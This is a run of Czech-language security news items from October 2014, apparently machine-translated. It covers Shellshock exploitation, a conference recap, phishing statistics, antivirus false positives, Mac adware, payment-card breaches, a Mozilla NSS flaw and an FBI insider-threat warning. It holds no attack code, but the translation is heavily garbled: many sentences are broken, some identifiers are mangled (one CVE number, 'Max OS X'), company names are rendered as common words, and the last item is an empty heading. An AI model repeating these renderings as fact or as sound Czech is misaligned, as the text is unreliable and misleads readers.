Můj kolega Santiago Pontiroli představil o aktuálním "Bitcoin zlatý důl", a jak se s počítačovou kriminalitou se rychle zaměřuje cryptocurrencies a jejich uživatelů. Zatímco sdílet některé z nejzajímavějších vzorků malwaru, které se zaměřují Bitcoin a jiných alternativních měn, diváci dostali přehled výhod, které digitální měny nabízejí zemích Latinské Ameriky a důvodech činnosti zločinců.

Santi

Třešničkou na první den dortu byla prezentace sdílí Patrick Wardle, který se vztahuje " Metody malware vytrvalosti na Mac OS X ", opět nám ukazuje, že ne všechno v malware ekosystému je o Microsoft.

S tolika dobrých jednání, aby se zúčastnili druhého dne, někdy dělat správná rozhodnutí bylo poměrně obtížné. Velmi zajímavé prezentace Jérôme Segura, pokud jde o technické podpory podvody, demonstroval v detailu, jak vytvořit honeypot chytit tyto podvodníky a zároveň zdůrazňuje, že je důležité povědomí uživatelů a vzdělávání.

Předložil jsem jeden rok výzkumů útoků proti " boletos " , starý a velmi oblíbený platebního styku z Brazílie se sídlem v tištěných dokumentech a čárových kódů, které ukazují, jak místní špatní přizpůsobily své trojských koní je změnit, přesměrování plateb na svých účtech, a krást miliony dolarů v procesu.

Fabio

Byl to obrat k mé kolegyně David Jacoby předložit velmi legrační (zatím informativní) prezentaci o tom, jak se naboural svůj vlastní domov , využívají různé chyby zabezpečení v síťových zařízení, jako jsou inteligentní televizory, tiskárny, NAS, atd interaktivně ukazuje, jak vystavovat těchto zařízení aby se útoky znamenat ohrožení celé domácí sítě, všechny prezentace byla zobrazena s legračními obrázky GIF a (kupodivu), diapozitivy byly ručně vytvořený s MS Paint.

david

Bezpečnostní výzkumníci společnosti Microsoft nám běh dolů na NET malware analýzy jejich poslední chvíli papíru "NET malware dynamické vybavení pro automatizované a manuální analýzy". Jako malware vývojáři se stále více spoléhají na vyšších programovacích jazyků pro své škodlivé výtvory, nástroje, jako je předloženou v této přednášce bude zásadní pro malware analytiků, kteří chtějí, aby se stal zdatný v NET Škodlivé aplikace studia.

A poslední Kaspersky prezentace byla od Vicente Diaz v "OPSEC pro výzkumníky bezpečnosti" . Pracuje jako bezpečnostní výzkumník je v dnešní době není snadný úkol, zvlášť teď, když už se zabývá pouze technickými aspekty. Globální obraz bezpečnostního prostředí v těchto dnech nabízí nové aktéry, včetně vlády, velkých společností, zločinecké gangy a zpravodajskými službami. To staví výzkumníky v některých obtížných situacích.

Vicente

Závěrečný panel byl zábavný a poučný, se David Jacoby přináší povědomí komunity o tom, jak se zveřejňování důležitých zranitelnosti (jako Heartbleed, a nyní neslavný Shellshock ) by měly být řešeny, a to, co role dělat prodejci hrají v tomto scénáři. Po proslovu Katie Moussouris z HackerOne na "Odměny a norem a vuln zveřejnění, oh my!", závěrečná panel od nás odešel s koherentní citem pro konference, čímž se do popředí to, co průmysl jako celek by měla být orientace v Podmínky zranitelností zveřejnění a stejné problémy jsme museli chránit připojená zařízení, internet věcí, Crypto měn a platebních systémů.

Časy se mění, ale stejné problémy přetrvávají, jedna věc je jasná, jsme stále tady pro ochranu uživatele a boj proti počítačové trestné činnosti.


Bash "Shellshock" chyba: Kdo potřebuje na starosti?
4.10.2014 Zranitelnosti
Jak se dalo očekávat, útočníci začali využívání GNU Bash "Shellshock" vzdálené spuštění kódu chyba (CVE-2014-6271), ke kompromisu systémy a infikovat je s malware. Po zveřejnění své existence, Alien Vault začala běží nový modul v jejich lákadla a čeká na útočníky, jejichž cílem je tuto chybu zabezpečení zneužít. "Měli jsme několik hitů v posledních 24 hodinách. Většina z nich jsou systémy se snaží zjistit, zda je systém zranitelný a jednoduše odeslat příkaz ping zpět ke stroji útočníka," sdílené výzkumník Jaime Blasco. "Kromě těchto hitů jsme našli na útočníky, kteří používají tuto chybu zabezpečení zneužít instalovat dva různé kusy malware na oběti." V první řadě, užitečné zatížení je ve formě ELF binárních, které otisky prstů infikované systémy, otevře backdoor do systému, a může systém účasti na DoS útoků a útoků hrubou silou. Zscaler a Kaspersky Lab mají více informací o tomto útoku, který jak se zdá, zaměřit Nginx a Apache webové servery nakonfigurovány pro použití mod_cgi . Ve druhém případě , užitečné zatížení je repurposed IRC bot, který se připojí k IRC serveru a čeká na příkazy. Mezitím, Google výzkumník Travis Ormandymu našel druhý způsob (CVE-2014 až 7169) pro zneužití této chyby, jako náplast pro upevnění CVE- 2014-6271 byla neúplná a může ještě dovolit některé znaky, které mají být vstříknut do cílového prostředí. To je chyba, která webový server administrátoři obávat nejvíce, a to zejména v případě jejich servery běží Bash z cgi-bin , poznamenal SANS ISC CTO Johannes Ullrich. On také poskytoval rady o tom, jak správci mohou chránit své servery (také zde ). "Webové servery nejsou jedinou aplikací v ohrožení," varuje Trend Micro. "SSH mohou být také citlivé na Shellshock. V tomto okamžiku libovolný server, Unix / Linux OS, který používá Bash jsou v nebezpečí. Ve výchozím nastavení je většina z nich použít Bash, s některými výjimkami. Například FreeBSD výchozí shell tcsh." Pravidelné uživatelé mohou povzdech úlevou, protože není mnoho koncových zařízení jsou zranitelní. "Aktuální údaje ukazují, že asi 10% uživatelů PC používat nějakou formu Linux nebo Max OS X. Tyto operační systémy mohou být náchylné k Shellshock, i když i zde těžba je mnohem obtížnější , "oni poznamenal . "Pro koncové uživatele, může největší obavy dobře být využije přes nepoctiví DHCP servery běží na potenciálně zasažených routery a aktivní Bash je používán klienty DHCP k nastavení systému,. klient připojení k nepoctivým serveru DHCP může skončit běhat škodlivé příkazy na jejich systém. To lze velmi snadno provést pomocí škodlivých otevřených Wi-Fi sítí. Doporučujeme uživatelům, aby se zvlášť opatrní, z nichž WiFi sítí pro připojení, ale to je již součástí nejlepších dlouhodobých postupů. " Android zařízení a iOS zařízení (není-li jailbroken) nejsou ovlivněny chyby. "Kořeny a upraven zařízení, která nyní běží na * NIX varianty (a, jako výsledek, Bash) může být ovlivněna," poukázali. Apple má zatím k vydání opravu pro OS X, ale podle na Apple mluvčí, drtivá většina uživatelů OS X nejsou ohroženy. "S OS X systémy jsou bezpečné standardně a není vystaveno vzdálených využije bash, pokud uživatelé konfigurovat služby pokročilé UNIX. Pracujeme rychle poskytnout aktualizaci softwaru pro naše pokročilé uživatele systému UNIX." Konečně, někteří Internet věcí zařízení postavené na vložené verze Linuxu jsou zranitelné, a chyba může být zneužita k lano je do botnetu. Bohužel, záplatování některých z těchto zařízení je problematické, jak se někteří z prodejců jsou velmi laxní, pokud jde o vytváření a vydávání aktualizací zabezpečení. "Tato chyba bude mít vliv nepoznatelný řadu výrobků a systémů, ale za podmínek, které využít to je docela neobvyklé pro vzdálené využití, " uklidnil . Rapid7 je Jen Ellis, a vyjádřil názor, že riziko rozsáhlých útoků ve volné přírodě je menší než Hearbleed Flavio De Cristofaro, VP of Engineering profesionálním výrobkům, společnosti Core Security, souhlasí: "Od můj pohled, Heartbleed byl trochu více znepokojující vzhledem k postižených částí a masivní použití SSL. Bash je k dispozici na většině * nix systémů, a mající Bash otočí hostitele zranitelné, ale ne nutně vzdáleně zneužitelné. jsou nutné další podmínky, aby . dovolit vzdáleně ohrozit bezpečnost hostitele podstatě musíte být schopni aplikovat příkazy do flámu ". "Uživatelé musí opravit Někteří lidé se doporučuje, aby uživatel zkontrolovat, zda jsou nebo nejsou běží CGI -., ale to je naprosto nestačí. C ++, Python, PHP a všechny ostatní aplikace, která umožňuje bash hovory jsou ovlivněny. Ostatní aplikace podporující protokol DHCP, SSH (restriucted shell), mohou být rovněž ovlivněny, a to nejen ze vzdáleného útoku, ale také z místní eskalaci práv pohledu. Takže náplasti, náplasti, náplasti, "radí. "Opravy jsou již k dispozici pro většinu známých systémů, nebo budou k dispozici velmi brzy. Někteří dodavatelé publikoval brzy opravu, která byla neúplná, a oni měli zveřejnit novou opravu dnes. Ponecháme-li stranou * nix distribuce, budou společnosti potýká se značnými problémy, pokud potřebujete opravit staré systémy nebo systémy založené na embedded zařízení, jako jsou kamery, routerů a ICS, pokud jsou spuštěny Bash. Naštěstí, že by neměla být příliš časté, protože Bash je obvykle příliš těžká pro systémy, jako je, že. "


Tvorba obranu jedna organizace incidentu každého
4.10.2014 Incidenty
Finanční služby sdílení informací a analytické centrum (FS-ISAC), organizace zaměřená na sdílení důležitých informací kybernetická bezpečnost hrozeb po celém světě, a depozitář důvěra & Clearing Corporation (DTCC), infrastruktura poobchodní trh pro globální odvětví finančních služeb, oznámila vytvoření strategického společného podniku pro rozvoj a automatizační řešení na trhu, které napomáhají schopnosti kybernetické bezpečnosti a odolnosti organizací kritické infrastruktury, včetně finančních služeb, kanceláří a dalších po celém světě. joint venture s názvem Soltra, byla zřízena za účelem poskytovat software pro automatizaci a služby, které shromažďuje, pálit a urychlen přenos hrozbách z nesčetných zdrojů na pomoc chránit před kybernetickými útoky. pravda iniciativu mezioborovou přes 125 členů FS-isac a zástupci dalších důležitých odvětví, orgány státní správy a soukromého sektoru přispěla ke požadavků, architektury a designu automatizační software Soltra je roztok Soltra hran. pojmenovaný po jednom z nejznámějších středověkých maják požáru sítí v Evropě, které varovaly útočníků, Soltra hran se připojí a zefektivnit tok hrozby inteligence mezi komunitami , osoby a zařízení při zpracování velkých objemů dat hrozeb, zlepšuje efektivitu a umožňuje okamžitý zásah v boji proti hrozbě a zmírnění rizik. Soltra hran je v současné době testován uživateli, a bude k dispozici na konci roku 2014. řešení byl navržen v měřítku podporovat tisíce organizací a pálit velké množství dat do využitelných informací, který lze snadno pochopit a používat. Využívá otevřené standardy, včetně strukturovaných informací Threat výraz (STIX) a Trusted automatizovanou výměnu Ukazatel informací (TAXII). Řešení bude zahrnovat platformy, infrastrukturu a ekosystém pomáhat jednotlivým organizacím všech velikostí, jiné sdílení informací a analytických středisek (ISACs), počítačové hrozby odpovědi (CERT), průmyslové subjekty a dodavateli v soukromém sektoru, aby se spojily, aby zjednodušit sdílení informací o hrozbách pomocí Stix a TAXII. "Dnes, většina cyber informace ohrožení jsou poskytovány ručně uživatelům z různých, vzájemně nepropojených průmyslových zdrojů. Z tohoto důvodu, v průměru to může trvat firmám sedm hodin vyhodnotit každý hrozbu, "říká Mark Clancy, generální ředitel Soltra, CISO z DTCC a člen FS-ISAC. "S Soltra Edge incidentu jedna organizace se stává obrana každého. Toto řešení umožní klientům posílat, přijímat a ukládat kybernetické bezpečnosti hrozbách v efektivní a automatizované podobě, což umožňuje těmto firmám nasadit ochranu před možným kybernetickým útokem. " "Jako joint venture, Soltra sestavil prvotřídní tým a podpora od některých z nejuznávanějších společností na světě, aby na architekta a vytvořit řešení pro sdílení informací zítřka, "říká Bill Nelson, prezident Soltra a prezident a generální ředitel společnosti FS-ISAC. "Dnešní hrozba sdílení zpravodajských informací musí probíhat při rychlosti sítě. Je třeba snížit zátěž pro bezpečnostní analytiky a pro menší organizace. Musí být k dispozici pro všechny kritické sektory za účelem sdílení informací v rámci jednotlivých odvětví a také cross-sektoru se zvýšila odolnost před počítačovými hrozbami. "


Útočníci jít po nebývalé šíři cílů
4.10.2014 Phishing
Apple je nejvíce podvodného značkou na světě, což představuje 17 procent všech phishingových zpráv, zařazeným do vzorku a analyzovány z první poloviny roku 2014, říká, že výsledky nového globálního Phishing průzkumu vydané APWG. Apple značky a přidružených značek, jako je například iTunes a iPad, zastínil trvalka phishing cílové oblíbený PayPal s výrobcem výpočetní zařízení trvalého 21951 z 123741 phishingových zpráv zařazených do vzorku. PayPal byl druhým nejvíce podvodného značka, zaměřena 17811 útoky, nebo 14,4 procent vzorku Účetního polovina je. Čínský tržiště Taobao byl třetí s 16.418 útoky, nebo 13,2 procenta útoků ve vzorku. "Jako světově nejcennější značkou s masivní on-line uživatelské základny, Apple byla vždy terčem phishingu, a phisheři soustředit více na on-line účet převzetí, spotřebitelů Apple ID jsou lákavý cíl, "řekl Rod Rasmussen, prezident a CTO IID a průzkumu spoluautor. "Když Apple poskytuje další služby a zařízení, vázané na něčí Apple ID, včetně právě oznámil Apple Pay , to není divu, že Útočníci zvyšují své úsilí oklamat spotřebitele, aby vyzradil své přihlašovací údaje, bez ohledu na dodatečných bezpečnostních opatření Apple zavádí, na ochranu svých zákazníků, "řekl Rasmussen. Zpráva zjistila, počítačové trestné činnosti gangů agresivně sledují značky rozmanitost v jejich on-line podvodů, spoofing, a jinak, využívající identitu některých 756 institucí, což je nejvyšší číslo analytici se zatím setkal. "Pokud web se v osobních údajů, jako jsou hesla nebo údaje o kreditní kartě, pak Útočníci ho mohou chtít využít," řekl Greg Aaron , předseda Illumintel a průzkumu v další spoluautor. "Jsme svědky nebývalé šíři cílů -. Skladování cloud míst, podniků veřejných služeb, poskytovatelé podnikatelské služby a realitní makléři" Z 87.901 domén používaných k phishingu Uvedla některé 22.679 domén, čtvrtina z celkového vzorku , že se autoři domnívají, byly registrovány zlomyslně o phisherů. Číslo je dáno především registrací čínských phisherů, kteří dávají přednost levné (a zdarma) registrace doménových jmen v některých TLD. Ostatní 65222 domény byly téměř všechny hacknutý nebo ohrožena na zranitelné web hosting.


CSAM: The Power of VirusTotal zapnout neškodné Binaries škodlivý
4.10.2014 Viry
Všichni víme, že anti počítačový virus, nutné zlo základní počítačové bezpečnosti, není cizí falešných poplachů. Takže žádné velké překvapení, když zde John píše, že se dostal do takový falešný poplach během reakce na incidenty:

Byl jsem skenování forenzní Drive Image s ClamAV a zaznamenal pozitivní zásah na souboru.

Skvělé. ClamAV, zdarma anti-virus produkt. Samozřejmě, že tomu nevěřím. Takže John udělal to, co většina z užívání by to udělal, a předložila podezřelého binární VirusTotal:

VirusTotal ukázal 14 z 50 výrobků jiných AV prodejců z nich ji považovalo malware stejně.

Ouch! 14 z 50? Mnoho skutečné vzorky malware jsem odeslal dostat nižší cenu a pak to. Ukázalo se, že binární otázky byl software pro správu desktopů, "lunchwrapper.exe" a AV nástroje zvedl na to je stažení souboru součásti (slavný "generic downloader" podpisy).

Ale myslíte, že to je špatné? Poslouchejte, co se stalo potom podle Jana:

Děsivé bylo, že poté, co jsem předložil vzorek, další významné AV prodejci rozhodl, že předložený vzorek byl škodlivý a náš koncový software spuštění karantény program po AV Dats byl aktualizován.

Koneckonců, jak můj kolega developer může potvrdit i: Důvod, proč jsme lidem umožní využít našich aplikací je tak, že jsme nemuseli dělat žádné testování sami.

(BTW: VirusTotal / Google dělá skvělou práci, a myslím, že je to dobrá věc, že ​​se distribuce vzorků Problém je v tom, jak AV prodejci tyto informace používat.).


Proč je váš Mac vše pro náhlé pomocí Bing jako vyhledávač?
3.10.2014 Hrozby
Dokonce i jako uživatel Mac, možná jste slyšeli o Bing, alespoň můžete vidět prokázal v reklamě. [1] Ale pokud váš výchozí vyhledávač na vašem počítači Mac je vše na náhle přešel na Bing, může to být způsobeno jiným kusem software dědictví, že někteří uživatelé Mac mohou mít pevný čas žít bez: Microsoft Internet Explorer. Tak proč ne jen hledat ("Google"), pokud je verze pro OSX:

Google vyhledávání pro "mac Internet Explorer"

Google vyhledávání pro "mac Internet Explorer"

Opravdu, tam je ZDARMA! Internet Explorer pro Mac k dispozici. Umožňuje stáhnout, a uvidíme, co se stane.

Jak to dopadá, stránka, kterou se chystáte ke stažení (obvyklý soubor .dmg), je podepsán platným Apple vývojáře podpisu. To bude instalovat v pořádku s výchozím nastavením "Strážní" Maverick je. Při instalaci nabízí pár další produkt zdarma. "Nákupní a Search Helper", stejně jako nějaký software, který vyčistí váš Mac a dělat to rychlejší a bezpečnější.

V některých ohledech, musím říct, že obdivuji, jak upřímný hledání optimizer je ve své EULA. Software bude (původní využívá všechny horní pouzdro pro tuto sekci, stejně jako je uvedeno níže):

.. RESET vaše domovská stránka A / NEBO výchozí vyhledávač pro Internet Explorer, Firefox a Chrome TROVI HLEDÁNÍ ...

BLOCK ... a upozorní vás pokusů jiným softwarem pro změnu VYBRANÉ ÚVODNÍ STRANA A / NEBO výchozí vyhledávání ...

Zásady ochrany osobních údajů Trovi je podobně explicitní, a neskrýval moštu. Tento software bude shromažďovat kromě jiného [2]:

IP adresa a zařízení identifikátory jako UDID
webové stránky, které navštívíte, a obsah, který vidíte, přístup a využití ...
interakce na sociálních sítích
Informace o registraci, které poskytnete, jako jméno, adresu, e-mail, telefonní číslo, pohlaví narozeninám
Na konci, můžete skončit s partou adware a vykazuje skutečný důvěryhodně verzi aplikace Internet Explorer 5, který slouží ke spuštění na Mac OS, ale ve skutečnosti běží na OS X Mavericks.

Pro úplný procházku zobrazení tohoto videa YouTube: https://www.youtube.com/watch?v=bVwyxaYJgKY

Stručně řečeno: Nemyslím si, že tento software dělá něco nedovoleného. To jasně inzeruje, co dělá. Pokud máte pocit, jinak, můžete podat stížnost u soudu na Kypru, kde se společnost nachází.

[1] https://www.youtube.com/user/bing
?? [2] http://info.trovi.com/Privacy


CSAM: My Storage Array SSHs Outbound!
3.10.2014 Hrozby
Kuddos Matouše pro věnování pozornosti výstupního provozu. Neustále zdůrazňovat, jak důležité je, aby ujistěte se, že systémy mluvit "odchozí" bez povolení. Právě tento minulý týden, různé Shellshock využije udělal jen, že: Otočte zařízení do IRC klientů nebo stahování dalších nástrojů přes HTTP, nebo jen zaznamenávají úspěch přes jednoduchý ping.

Není tedy divu, že Matouš nám napsal: " ... poprvé jsem viděl na diskové pole SSH na internetu jsem o omdlel ... ".

Byl bych překvapen, taky! A ukázalo se, že není jediný člověk, který zažil to. Mark poznamenal:

"Kdyby se zdá podivný okamžik, kdy jsem viděl, se to stalo. SAN šťastně komunikaci s vnějším subjektem. Přestože společnost byla dobře a opravdově hosed."

Naštěstí, než se příliš daleko do jízdní vlastnosti události, Matthew si uvědomil, že to byl falešný poplach. Diskové pole v otázce s názvem "domů" na dodavatele, aby zprávy o jeho stavu. Účelem tohoto sdělení je informovat neúspěšné disky nebo jiné kritické události, které mohou vyvolat do servisu. Prodejci budou souhlasit, aby tuto funkci vypnout, ale pak je samozřejmě na vás, abyste rozpoznat vadné disky.

Máš něco takového? Dejte nám vědět . (Je-li to možné s log úryvek / zachycování paketů nebo jiné výstavy-and-říká)


216 Jimmy Johnovy obchody ovlivněna porušením dat
3.10.2014 Incidenty
Populární americký licenční sendvič restaurace řetězce Jimmy John je potvrdila, že utrpěl narušení dat, která ovlivnila přibližně 216 svých obchodů v celé zemi. Společnost byla poprvé oznámena možného bezpečnostního incidentu kreditních a debetních karet údaje zákazníků 30. července , 2014, a soudní znalci okamžitě najal třetích stran, na pomoc při vyšetřování. "Zatímco vyšetřování pokračuje, zdá se, že kreditních a debetních karet údaje zákazníků byla ohrožena poté, co útočník ukradl přihlašovací pověření od Jimmy John je point-of- prodejce prodej a používal tyto ukradené pověření pro vzdálený přístup k systému point-of-sale u některých firemních a franšízy místech mezi 16 června 2014 a 05.9.2014, "společnost sdílí . "karty ovlivněné touto událostí se zdají být ty Přijata v obchodech, a nezahrnoval ty karty ručně, nebo on-line. Informace o kreditní a debetní karty se jedná, může obsahovat číslo karty a v některých případech se jméno držitele karty, ověřovací kód, a / nebo karty datum expirace. Informace vstoupil on-line, jako je adresa zákazníka, e-mail a heslo, zůstanou v bezpečí. " Společnost říká, že jsem obsahovalo kompromis, a že budou instalovat šifrované Přejeďte strojů, provádění vylepšení systému a přezkoumávat své politiky a postupy pro jeho dodavatelů třetích stran s cílem zabránit podobných porušování v budoucnosti. Jak se dalo očekávat, které již byly poskytnuty bezplatné služby ochrany identity pro všechny zákazníky, kteří používají kreditní / debetní karty v jednom z Jimmyho Janových místech v uvedených termínech, a mají varoval potenciálně zasažených uživatelů phishing e-maily a hovory, které by mohly obdržet v důsledku tohoto oznámení. Podle Brian Krebs , dodavatelem point-of-prodej, jejichž log-in pověření bylo ohroženo je Pensylvania založené Signature Systems.


Kritická chyba SSL oprava v Firefox, Thunderbird, Chrome
3.10.2014 Zranitelnosti
Jste-li uživatelem Mozilla Firefox, Thunderbird nebo SeaMonkey, byste měli implementovat nejnovější záplaty vydané společností co nejdříve, protože opravit kritickou chybu, jejíž využití může vést k úspěšnému útoku Man-in-the-middle. chyba postihuje všechny verze knihovny Mozilla NSS, a dělá to náchylné k variantě podpisu padělání útoku dříve vydané Daniel Bleichenbacher, Mozilla vysvětlila . "To je způsobeno mírným parsování ASN.1 hodnot zapojených do podpisu a mohla by vést k utváření RSA certifikáty." Závažnost vady svědčí i fakt, že US-CERT vydal výstrahu o tom, ve kterém oni také varoval, že zranitelné Mozilla NSS knihovna je často zahrnuta do třetího-party software, včetně Linuxových distribucí, Google Chrome, Google OS a další. Společnost Google vydala aktualizaci zabezpečení, která opravuje chybu, pro její Chrome stabilní kanál, takže uživatelé Chrome měli aktualizovat stejně. Doufejme, že záplaty pro ostatní software obsahující tuto chybu brzy následovat. Další technické informace o vadu lze nalézt zde . chyba byla hlášena jak Antoine Delignat-Lavaud, bezpečnostní výzkumník v INRIA Paříži v týmu Prosecco, a Advanced Threat Research týmu na Intel bezpečnosti.


Kritická chyba Bash otevře UNIX, Linux, OS X na útoky
3.10.2014 Zranitelnosti
Bash "Shellshock" chyba ( CVE-2014-6271 ) byla objevena minulý týden Unix / Linux odborné Stephane Chazelas, a jeho existence byla zveřejněna ve středu. Ovlivňuje Bash , interpret příkazů přítomné na mnoha unixových systémů a systémů založených na IT: různých Linuxových distribucí a Apple OS X. To může být zneužita útočníky, kteří se snaží potlačit nebo omezení bypass prostředí spouštět příkazy shellu, tedy neoprávněný, škodlivý kód. vada je považována za kritickou pro mnoho důvodů. Za prvé, počet postižených zařízení je obrovský: myslíte, že o všech webových serverech (včetně těch, Apache) a embedded zařízení (routery, atd), běží na systému Linux, počítače Mac ... počet může velmi dobře být ve stovkách miliony. Za druhé, US-CERT a NIST dal maximální skóre (10,0), jak pro dopad a využitelnosti. Využití vady může vést k neoprávněnému zveřejnění informací, proti neautorizovanému přístupu do systému a modifikaci, a narušení služby, a postup využití je velmi krátká a jednoduchá:. To trvá jen pár řádků kódu Podle CloudFlare bezpečnostní inženýr Ryan Lackey , chyba je již využíván v přírodě ručně, a je to jen otázkou času, kdy někdo vytvoří červa a automatizuje útok a umožňuje skákat z jedné zranitelné systému do druhého. Nakonec, chyba byla přítomna celá léta, ale to je nemožné říci, zda to byl využit při útocích dřív. Sean Gallagher sdílí snadný způsob, jak zjistit, zda váš systém Linux nebo Unix je zranitelný, a dobrou zprávou je, že mnoho populárních distribucí Linuxu již vydal patch . " GNU Bash oprava je k dispozici i pro zkušené uživatele a správce k provádění, "US-CERT uvedeno v oznámení. Zatímco oprav sám je snadné a může být provedena rychle, že hlavní problém pro správce bude vystopovat všechny zařízení, která jsou zranitelné, a to zejména pokud budou jejich sítě jsou obrovské a složité. "Na rozdíl od Heartbleed, která ovlivnila pouze určitou verzi OpenSSL tento bash chyba byla po dlouhou, dlouhou dobu. To znamená, že existuje spousta starých zařízení v síti zranitelné ve vztahu k této chybě. Řada systémů, které je třeba oprava, ale nebude, je mnohem větší, než Heartbleed, " poznamenal errata zabezpečení na Robertem Grahamem. "Existuje jen málo třeba spěchat a opravit tuto chybu. Vaše primární servery jsou pravděpodobně náchylnější k této chybě. Nicméně, všechno ostatní asi je. Skenování sítě pro věci, jako Telnet, FTP, a starší verze Apache (masscan je velmi užitečné pro toto). Cokoli, co reaguje je pravděpodobně starý přístroj potřebovat bash opravu. A protože většina z nich nemůže být oprava, jste pravděpodobně v háji. " Domácí uživatelé, kteří musí dělat skutek sami se doporučuje pravidelně kontrolovat webové stránky výrobců, jejichž zařízení (například směrovače), které vlastní pro aktualizace zabezpečení k řešení problému, a k provedení těchto aktualizací, jakmile budou moci. To platí i pro uživatele OS X stejně.


FBI varuje před nebezpečným zasvěcených hrozby zvýšení
3.10.2014 Hrozby
FBI a DHS vydaly varování pro podniky o zvýšení bezpečnostních incidentů zahrnujících nebezpečné zasvěceným (současné nebo bývalé zaměstnance, dodavatele nebo jiné obchodní partneři). "vykořisťování obchodních sítí a serverů nespokojeným a / nebo bývalých zaměstnanců má za následek v několika významných vyšetřování FBI, ve kterém jednotlivci používají jejich přístup ke zničení dat, krást proprietární software, získávat informace o zákaznících, kupte nepovolené zboží a služby pomocí klientských účtů a získat konkurenční výhodu na nové společnosti, "uvedly. "odcizení chráněné informace v mnoha z těchto incidentů byl usnadněn pomocí webových úložišť cloud, jako Dropbox a osobních e-mailových účtů. V mnoha případech ukončena zaměstnanci pokračoval přístup k počítačovým sítím prostřednictvím instalace neoprávněného Remote Desktop Protocol software . Instalace tohoto softwaru došlo před opuštěním společnost. " Tam také byli několik vydírání pokusů, kdy nespokojení či bývalí zaměstnanci se pokusili vydírat peníze od svého zaměstnavatele úpravou a omezení přístupu k webům společnosti, vypnout funkce systému pro správu obsahu, a provádění DDoS útoky. Předsednictvo bere na vědomí, že bezpečnostní incidenty týkající se zasvěcenými může stát společnosti hodně peněz, a mají společnou sadu doporučení pro předcházení takovým incidentům zabránit ve své organizaci. Patří mezi ně ukončení přístupu zaměstnanců na účty, které nepotřebují přístup k, končit účty zaměstnanců nebo dodavatelé "okamžitě propuštěn, jakékoliv změny hesla pro správu znaly, brání zaměstnancům v přístupu k ukládání dat mrak webové stránky a stahování neoprávněný vzdálený přihlašovací aplikace na firemních počítačích, a další .


Spotřebitelé stále vinu společnosti za porušení dat
3.10.2014 Incidenty
Kupředu, každá firma zapojená do hlavní datové porušení, které se skutečně napadl, jako jsou maloobchodníci Home Depot, cíl, dobré vůle a Neiman Marcus, stejně jako banky, zdravotní péče, pojištění a poskytovatele služeb internetu, atd, se bude platit ještě vyšší cenu, pokud jsou informace zákazníků ohrožena. Ve skutečnosti, každý high-profil hack vybírat svou daň na Executive Suite a spodní linie podobně, říkají výsledky průzkumu provedeného HyTrust. Z průzkumu vyplývá, že více než polovina všech respondentů, 51%, bude mít své podnikání jinde po porušení, který ohrožuje osobní údaje, včetně adresy, čísla sociálního pojištění, a údaje o kreditní kartě. téměř tolik, 45,6% tvrdí, že zúčastněné podniky by měly být považovány za "kriminálně nedbalé" v okamžiku, kdy dojde k porušení, se většinou také věří, že všichni důstojníci společnosti by měl být odpovědný. více než třetina, 34,2% si myslí, nejhorší údaj být ohroženy, je číslo sociálního zabezpečení (SSN). Tato zjištění jsou významná, jelikož otázka bezpečnosti dat je celé titulky ... znovu. Jen tento měsíc, maloobchodní gigant Home Depot se stal poslední obětí masivní kybernetické útok, a my teď víme, že je to potenciálně největším maloobchodním narušení bezpečnosti v historii. Společnost uznala, že long-running, sofistikovaný hack s průniky počínaje zpět v dubnu za použití vlastní-postavený malware vedly k odcizení několika 56000000 kreditních a debetních karet. To by znamenalo, že předčí dokonce i ohromující ztráty plynoucí z útoku na cíl pozdě v roce 2013. Ta epizoda vedlo k velkým změnám v Executive Suite; to se teprve uvidí, jaký vliv nejnovější objevy z Home Depot bude mít, ale je pravděpodobné, že bude těžké. "Tam asi není jediný slámy, která rozbila velbloudí záda, je to jen naprostý objem příběhů o narušení dat, mnozí na společnosti, které vyvinuly zbrusu zákazníka příjemný, "řekl Eric Chiu, prezident na HyTrust. "Co je toto hlasování ukazuje, že společnosti jsou nakonec a nevyhnutelně, že se na účet svých bezpečnostních chyb. Spotřebitelé mají možnosti, a když tam jsou nekonečné příběhy o ztrátě důvěrných informací, jdou do jiných dodavatelů. Každé narušení bezpečnosti má zjevně přímý dopad na provoz, ale je tu nyní jasné důkazy o tom, že tam je rozsáhlé poškození značky stejně, a manažeři podílející se budou muset zaplatit. " Každá otázka dotázaných 2000 respondentů, který nabízí jasný výhled na rozvíjející se spotřebiteli způsob myšlení týkající se této složité problematice. Například:

Jednou je dost: Většina spotřebitelů (45,6%) za zlé, že společnosti, které se v okamžiku, kdy k porušení dat dochází, zatímco pouze 12% Potlacit odsouzení, dokud "to se stává více než jednou." Navíc tato ukazování prstem se zvyšuje s věkem, s 34% z 25 až 34 rok věku, kterým se okamžité vinu verše 51% těch 65 a nahoru. Více spotřebitelům, ale více odpouštět mají tendenci být; Horní odpověď pro ty, kteří $ 150K nebo více posunul k "když se to stane více než jednou." Vina je také více vehementně se zaměřil na porušené společností, pochopitelně, když je identita člověka odcizení nebo zneužití.
Příjmy a pohlaví Oblast: Vyšší výdělky se více zajímají o své SSNs: 36.5% těch, kteří učinili $ 50k- 74 dolarů citovat tento potenciální krádež jako nejzávažnější, zatímco klesá na 22,8% mezi těmi, takže $ 24k nebo méně. Mezitím žen (17,9%) jsou dvakrát častěji než u mužů (9,6%), se starat o ztrátu rodinné fotografie a upomínky.
Mluvit s jejich peněženky: Zatímco 51% respondentů celkově říci, že budou mít své podnikání jinam po porušení dat, toto číslo vyskočí na 60,2% mezi spotřebiteli v 35-44 věkovém rozmezí. Toto zjištění, která se zaměřuje na klíčové demografické, by měla dát maloobchodníci a další potenciální cíle významný důvod k obavám.
Chief Security Officers (OOS / CISO) berou na vědomí: Když zeptal se, kdo především by se měla konat "konečnou zodpovědnost" za chyby v informační bezpečnosti, 19,7% respondentů nedělají rozdíl mezi pracovníky s různou odpovědností a ukázal prstem na ' všichni důstojníci "společnosti. Avšak muži a ženy ve věku od 25 do 34 identifikovat organizace občanské společnosti jako nejvíce zodpovědný, zatímco v 45 - 54 věkové skupiny jít nejjednodušší na ně.
Správní rada vystupuje jednoduché: radě společnosti Představenstvo je hodnocena jako právnické osoby nejvíce "z obliga", pokud jde o odpovědnost za porušení dat.


Pět největších datových mýty odhaleny
3.10.2014 IT
